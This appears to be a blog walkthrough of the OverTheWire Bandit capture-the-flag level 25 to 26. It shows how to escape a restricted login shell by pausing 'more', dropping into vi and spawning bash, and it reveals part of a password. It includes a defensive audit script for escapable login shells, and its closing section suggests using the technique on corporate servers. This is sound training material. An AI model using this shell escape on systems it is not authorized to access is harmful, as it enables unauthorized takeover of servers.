Bandit Level 26 Walkthrough

Level 25 ➔ Level 26: Escaping the Restricted Shell

1. My Objective

I am currently logged in as bandit25. My goal is to log into bandit26. I have been provided with an SSH key (bandit26.sshkey) in my home directory. However, there is a catch: bandit26 does not use the standard /bin/bash shell. Instead, it uses a custom script that shows some text and immediately logs me out. I need to find a way to "break out" of that script and get a real command prompt.

The Technical Problem: When I log in via SSH, the server executes the user's assigned shell. If that shell is a script that ends with exit, the connection closes instantly. I have to interrupt that script before it finishes.

2. The Feynman Explanation: The Rigged Elevator

How do I get into a building if the elevator is programmed to take me straight back to the lobby the moment I get in?

The Maintenance Hatch Analogy:

Imagine I enter an elevator (the SSH connection). The elevator has no floor buttons; it is hard-coded to show me a picture of the building and then go back down to the street.

To stop it, I have to make the elevator "Wait." I do this by shrinking the elevator car so much that the picture it wants to show me doesn't fit on the wall. The elevator is forced to pause and ask: "This picture is too big, do you want me to scroll down?" (This is the Pager or more command).

While the elevator is paused and waiting for my answer, I notice a hidden Maintenance Hatch (the 'v' key) in the ceiling. I climb through that hatch into the building's inner workings (the Editor/vi). Once I am in the maintenance area, I can tell the building: "Ignore the elevator's rules; give me the Master Key." Escaping a shell is about finding the moment a program pauses to talk to you and using that moment to jump into a different program.

3. Practical Solution

I start by checking the shell used by bandit26. Then, I use a terminal resizing trick to force the login script to pause.

# Step 1: Check what shell bandit26 is using
bandit25@bandit:~$ grep bandit26 /etc/passwd
bandit26:x:11026:11026:bandit26:/home/bandit26:/usr/bin/showtext

# Step 2: I check what 'showtext' does
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
more ~/text.txt
exit 0

# Step 3: THE ESCAPE
# 1. Shrink your terminal window manually (make it only 2-3 lines tall).
# 2. Log in using the SSH key.
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost -p 2220

# 3. Because the window is small, 'more' pauses. Type 'v' to enter vi.
# 4. Inside vi, type the following commands:
:set shell=/bin/bash
:shell

# Step 4: I am now in a real shell. Let's get the password!
bandit26@bandit:~$ cat /etc/bandit_pass/bandit26
c764Ng6pE6vSAr4S019SAb36906sV... (Password Revealed!)

Why did this work?

The more command is a "pager"—its job is to show text one screen at a time. When my window was too small to show the whole file, more stopped and waited for my input. By pressing 'v', I used a built-in feature of more that opens the current file in the vi editor. From inside vi, I reconfigured the internal "shell" variable and told the editor to spawn a new bash process for me.

🚀 My Pro Tips: Breaking Pagers and Editors

✨ The /etc/passwd Goldmine

Whenever I encounter a user that I can't log into, the first thing I check is /etc/passwd. This file tells me the user's home directory and, most importantly, their Login Shell. If the shell isn't /bin/bash or /bin/sh, I know I'm dealing with a restricted environment.
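
Seen from the administrator's side, the same /etc/passwd check can be automated. The script below is an added example, not part of the original walkthrough: it flags accounts whose login shell is a script that mentions a pager or editor. The function names, the ESCAPABLE list, the svcnotice account and /usr/bin/notice are constructed for illustration, and the whole-word match is a heuristic.

```sh
#!/bin/sh
# Added example: audit login shells for scripts that start a pager or editor.
# ESCAPABLE is an illustrative, non-exhaustive list of programs that can
# hand the user an editor or a shell from their prompt.
ESCAPABLE='more|less|man|vi|vim|view|ed'

# audit_login_shells PASSWD_FILE [ROOT]
# Prints "user shell programs" for each account whose login shell is a
# script mentioning one of the programs above. ROOT is prefixed to every
# shell path so an offline image or a test tree can be audited.
audit_login_shells() {
    passwd_file=$1
    root=${2:-}
    while IFS=: read -r user pw uid gid gecos home shell; do
        target="$root$shell"
        [ -n "$shell" ] && [ -f "$target" ] || continue
        # Compiled shells are skipped; only '#!' scripts are inspected.
        head -n 1 "$target" | grep -q '^#!' || continue
        # Drop comment lines, then collect whole-word matches.
        hits=$(grep -v '^[[:space:]]*#' "$target" |
               grep -Eow "$ESCAPABLE" | sort -u | tr '\n' ',' | sed 's/,$//')
        if [ -n "$hits" ]; then
            printf '%s %s %s\n' "$user" "$shell" "$hits"
        fi
    done < "$passwd_file"
    return 0
}

# make_sample_tree DIR: constructed sample data modelled on this level.
make_sample_tree() {
    mkdir -p "$1/usr/bin" "$1/etc"
    printf '#!/bin/sh\nmore ~/text.txt\nexit 0\n' > "$1/usr/bin/showtext"
    printf '#!/bin/sh\n# shows no more than a notice\necho "maintenance"\n' \
        > "$1/usr/bin/notice"
    cat > "$1/etc/passwd" <<'EOF'
bandit25:x:11025:11025:bandit25:/home/bandit25:/bin/bash
bandit26:x:11026:11026:bandit26:/home/bandit26:/usr/bin/showtext
svcnotice:x:12000:12000:constructed:/nonexistent:/usr/bin/notice
EOF
}

demo_dir=$(mktemp -d)
make_sample_tree "$demo_dir"
audit_login_shells "$demo_dir/etc/passwd" "$demo_dir"
rm -rf "$demo_dir"
```

On a live system the call is audit_login_shells /etc/passwd with no second argument. Each reported account deserves a manual look at how its login script displays text.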

⭐ vi is a Powerhouse

Many legacy Linux tools allow you to "escape" to an editor. If you ever find yourself in a tool that uses a pager (like man, less, or more), try pressing 'v'. If it opens an editor, you likely have a path to a full shell.

🔍 Windows Users Beware

As the mission note says: PowerShell handles window resizing differently and might not trigger the more pause correctly. If you're on Windows, use the old Command Prompt (cmd.exe) for this specific level.

4. Why this matters

I see "Restricted Shells" (rbash) often in corporate environments where a company wants to give a contractor access to only one specific tool (like a database console). If that tool has a "Help" menu or a "View Logs" option that uses a pager, I can use this exact technique to escape the restriction and gain full access to the server's operating system.

Prison Break Successful!

I've successfully escaped the restricted shell. I'll save this password and move on to Level 26 ➔ Level 27, where I will encounter my first setuid binary that I can't simply read!

Tags: #Linux #Bandit #OverTheWire #ShellEscape #RestrictedShell #vi #MoreCommand #PrivilegeEscalation #CyberSecurity #FeynmanTechnique #CodeWithPritom #ProTips
